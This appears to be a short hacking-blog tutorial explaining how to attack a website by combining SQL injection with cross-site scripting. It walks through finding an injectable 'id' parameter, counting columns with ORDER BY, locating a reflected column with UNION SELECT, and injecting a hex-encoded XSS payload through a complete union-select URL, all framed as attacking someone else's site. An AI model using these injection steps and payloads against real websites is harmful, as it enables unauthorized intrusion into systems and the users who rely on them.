• Home
  • SQL Injection
  • Web Hacking
  • Linux

    • Friday, 9 October 2015

    Home » » XSSQLi Attack On A Website!

    XSSQLi Attack On A Website!

    By No comments




    Hey Guys!


    Today I am going to tell you that how to attack a website using XSS (Cross-Site-Scripting + SQLi).
    This is pretty simple! We just have to inject our JavaScript code in the website. I will not teach you the basics of SQLi, you can find them on my this tutorial.
    Step 1: First we have to find a SQLi vul. Site.
    Like this:
    http://www.site.in/index.php?id=3

    Step 2: Finding the number of columns on the site using ORDER BY method.
    So our site have 6 columns!

    Step 3: Finding the vulnerable column, using UNION SELECT method.
    An the most vulnerable column is 3!

    Step 4: Now we will inject our XSS payload into it. To make things simple we will encode our payload into hex. 

    Our XSS payload:
    <img src=x onerror=confirm(/XSS/)>

    Hex encoded payload: 
    0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
    

     
    

    Step 5: Injecting the payload into our site ;)
    

     
    

    http://site.com/index.php?id=-3' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4,5--+
    

     
    

    Good Bye, Video for this tutorial is coming soon on my Channel (Ahsan Tahir)
    

    
     
    

     
    

     
    

     
    

    

      
    

    


    

     
      
    Share:  Facebook Twitter Google+

    0 comments:

    Post a Comment